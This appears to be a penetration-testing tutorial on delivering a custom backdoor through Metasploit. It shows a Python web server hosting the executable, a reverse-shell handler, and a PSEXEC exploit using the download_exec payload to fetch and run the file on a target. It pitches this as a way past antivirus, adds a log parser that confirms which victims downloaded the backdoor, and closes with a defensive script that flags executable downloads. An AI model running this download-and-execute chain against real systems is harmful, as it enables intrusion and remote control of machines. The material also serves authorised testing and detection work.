Metasploit - Custom Payloads


You launch your Metasploit exploit. It looks like it is working but no session is created. What happened? Your exploit just got popped by antivirus software. Such a bummer. Antivirus software is a hurdle that you have to overcome as a penetration tester, modeling the techniques of the real-world bad guys. The best way to avoid antivirus software is to stop using a payload that someone else created. Time and time again, penetration testers find they have a basic need to use custom payloads.

Create your own custom payload, and then you won’t have to worry about an AV signature catching your payload and eating it! It is easy and it gives you the flexibility to go after any target. There are lots of tools and articles to help you do so, including the Veil framework.

So you build your own custom payload, now what? How do you operationalize your payload? How do you deliver it to a target and execute it? There are lots of ways to deliver a custom payload, but I’ll cover one of the easiest and most flexible options here.

Metasploit’s Download/Exec Payload is a great option for delivering a custom payload to a target. You can use it with most of Metasploit’s exploits including memory corruption exploits, misconfiguration exploits, and authenticated attacks like PSEXEC. This flexibility means with this Metasploit payload, you can use your custom payload with the Meterpreter.

To use the Download/Exec payload, you will need to do three things. First, you’ll need a website from which the victim can download your custom backdoor. Second, you will need to set up a Metasploit handler to receive the connection from your custom backdoor. Lastly, you’ll need an exploit to deliver your custom payload. Let’s take a look at each of the steps.


A website to provide the “Download” in the Download/Exec payload

You have lots of options for a website to deliver your payloads. Any time I need a “quick and easy” website I use Python. The first step to starting the Python web server is to change to the directory that contains the files you want to make available for download. Then the command “python -m SimpleHTTPServer” can be used to start a web server. The files in that directory can then be downloaded using any web browser. You can set up this server on any computer that has Python installed. Here, I’ve started a web server listening on port 8000. When the exploit runs you’ll see the download being logged by your web server. Here you can see the victim 10.1.1.170 downloading a copy of “pythonbackdoor.exe”.

[nixawk@core ~]$ python -m 'SimpleHTTPServer' 8000
Serving HTTP on 0.0.0.0 port 8000 ...
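The request lines the server prints are what tell you which hosts actually pulled the file. The following is an added example, not code from the original article: it parses the access-log format that SimpleHTTPServer (and its Python 3 successor, http.server) writes, using a constructed log excerpt, and reports which clients fetched the backdoor, how many times, and when they first did so. The function names and the sample lines are assumptions.

```python
import posixpath
import re
from collections import Counter

# Access-log line as written by SimpleHTTPServer (Python 2) and http.server (Python 3):
#   <client> - - [<timestamp>] "<method> <path> <version>" <status> -
LOG_LINE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})\b'
)

# Constructed excerpt of a server session (assumed values, not taken from the article).
SAMPLE_LOG = """\
Serving HTTP on 0.0.0.0 port 8000 ...
10.1.1.170 - - [20/Mar/2014 10:15:32] "GET /pythonbackdoor.exe HTTP/1.1" 200 -
10.1.1.171 - - [20/Mar/2014 10:16:04] "GET /pythonbackdoor.exe HTTP/1.1" 200 -
10.1.1.171 - - [20/Mar/2014 10:16:40] "GET /favicon.ico HTTP/1.1" 404 -
10.1.1.170 - - [20/Mar/2014 10:17:02] "GET /pythonbackdoor.exe HTTP/1.0" 200 -
"""


def parse_log(text):
    """Return one dict per request line; the banner and unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        # Drop any query string so "/x.exe?1" still counts as x.exe.
        rec["file"] = posixpath.basename(rec["path"].split("?", 1)[0])
        records.append(rec)
    return records


def delivery_report(text, filename):
    """Summarise who fetched `filename` successfully and what else was requested.

    fetched:        {client: number of HTTP 200 responses for filename}
    first_seen:     {client: timestamp of that client's first successful fetch}
    other_requests: [(client, path, status)] for everything else, in log order
    """
    fetched = Counter()
    first_seen = {}
    other = []
    for rec in parse_log(text):
        if rec["file"] == filename and rec["status"] == 200:
            fetched[rec["client"]] += 1
            first_seen.setdefault(rec["client"], rec["when"])
        else:
            other.append((rec["client"], rec["path"], rec["status"]))
    return {"fetched": dict(fetched), "first_seen": first_seen, "other_requests": other}


if __name__ == "__main__":
    report = delivery_report(SAMPLE_LOG, "pythonbackdoor.exe")
    for client, count in sorted(report["fetched"].items()):
        print(f"{client} fetched pythonbackdoor.exe {count}x, first at {report['first_seen'][client]}")
    for client, path, status in report["other_requests"]:
        print(f"other request: {client} {path} -> {status}")
```

Repeated fetches from one client (10.1.1.170 above) are worth noticing: an exploit that re-ran, or an AV product pulling a second copy for inspection, both show up here before any shell does.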

Start a handler to receive your shell

Starting the multi/handler requires a few simple commands. First is “use multi/handler”. Next, set your payload to one that is compatible with the custom payload you created. If your payload contains Meterpreter then you will “set payload windows/meterpreter/reverse_tcp”. If it is a command prompt then you would type “set payload windows/shell/reverse_tcp”. Since my Python backdoor sends a command prompt, the correct payload here is “windows/shell/reverse_tcp”. This “single” payload doesn’t use a stager and expects a connection from a shell. Do not confuse this with “windows/shell_reverse_tcp”, since “windows/shell_reverse_tcp” expects a connection from a stager, not a shell.

Setting LHOST to 0.0.0.0 will cause Metasploit to listen on all the network addresses on your host. This is a good shortcut for single payloads, but it is not a good idea to use it for staged payloads. Some stagers, for example /*/reverse_http, will require that you have an actual routed address so that the stager knows where to download the next stage. Then set your LPORT to the port your custom payload is hardcoded to connect to. In this example, my payload is set to send a command prompt to port 80. Finally, you’ll need to start the multi/handler, but since our work in Metasploit is still not finished, start it as a background task: the “-j” option to the exploit command starts the multi/handler as a “job” that runs in the background.

msf > use multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     0.0.0.0          yes       The listen address
   LPORT     80               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Exploit the target and deliver the payload

With your handler in the background waiting to receive a connection, you’re ready to exploit the target. Just about any exploit could be used, but remembering my Penetration Tester’s Pledge, I’ll use PSEXEC. First, I use “windows/smb/psexec” and set it up with the correct username and password for the target. Then I set my payload by typing “set PAYLOAD windows/download_exec”. The options are pretty simple. You set the URL to point to the custom payload on the web server that you set up in step 1. You can change the name of the file that will be saved to the target if you like.

msf exploit(psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                 192.168.1.100    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass               testpass         no        The password for the specified username
   SMBUser               testuser         no        The username to authenticate as


Payload options (windows/download_exec):

   Name      Current Setting                         Required  Description
   ----      ---------------                         --------  -----------
   EXE       backdoor.exe                            yes       Filename to save & run executable on target system
   EXITFUNC  process                                 yes       Exit technique (accepted: seh, thread, process, none)
   URL       http://192.168.1.108:8000/backdoor.exe  yes       The pre-encoded URL to the executable


Exploit target:

   Id  Name
   --  ----
   0   Automatic

When you type “exploit” you will see it download from your website and a shell will appear in your handler. Game On. Let the pivots begin.
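Seen from the other side of the wire, this delivery leaves a characteristic request: a Windows executable fetched from a bare IP address on a non-standard port, exactly the shape of the URL in the options above. The following is an added example, not code from the original article: it scores requests from a constructed set of proxy records by those three indicators, so that the download_exec fetch ranks above an ordinary installer download. The record layout, indicator names and the extension list are assumptions.

```python
import ipaddress
import posixpath
from urllib.parse import urlparse

# Windows file types that run as code when launched; .exe is what download_exec saves and runs.
EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".pif", ".msi"}
STANDARD_PORTS = {"http": 80, "https": 443}

# Constructed proxy records (assumed values): (client, requested URL, HTTP status).
SAMPLE_REQUESTS = [
    ("10.1.1.170", "http://192.168.1.108:8000/backdoor.exe", 200),
    ("10.1.1.171", "http://downloads.example.com/setup.exe", 200),
    ("10.1.1.172", "http://192.168.1.50/index.html", 200),
    ("10.1.1.173", "http://10.0.0.5:8080/api/status", 200),
]


def download_indicators(url):
    """Return the indicators a URL matches, in a fixed order; [] means nothing notable."""
    parts = urlparse(url)
    hits = []
    # 1. Host given as a bare IP address rather than a name.
    try:
        ipaddress.ip_address(parts.hostname or "")
        hits.append("ip-literal-host")
    except ValueError:
        pass
    # 2. Explicit port that is not the scheme's default (e.g. :8000 for http).
    default = STANDARD_PORTS.get(parts.scheme)
    if parts.port is not None and parts.port != default:
        hits.append("non-standard-port")
    # 3. The requested resource is a Windows executable.
    ext = posixpath.splitext(parts.path)[1].lower()
    if ext in EXECUTABLE_EXTENSIONS:
        hits.append("executable-download")
    return hits


def triage(requests):
    """Keep only completed executable downloads; severity = number of indicators hit.

    Returns [(client, url, severity)] sorted most suspicious first.
    """
    flagged = []
    for client, url, status in requests:
        if status != 200:
            continue
        hits = download_indicators(url)
        if "executable-download" in hits:
            flagged.append((client, url, len(hits)))
    return sorted(flagged, key=lambda item: item[2], reverse=True)


if __name__ == "__main__":
    for client, url, severity in triage(SAMPLE_REQUESTS):
        print(f"severity {severity}: {client} fetched {url}")
```

The executable download is the required indicator; the IP-literal host and the odd port only raise the severity, which keeps a signed installer from a named vendor host near the bottom of the list while the 192.168.1.108:8000 fetch sits at the top.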

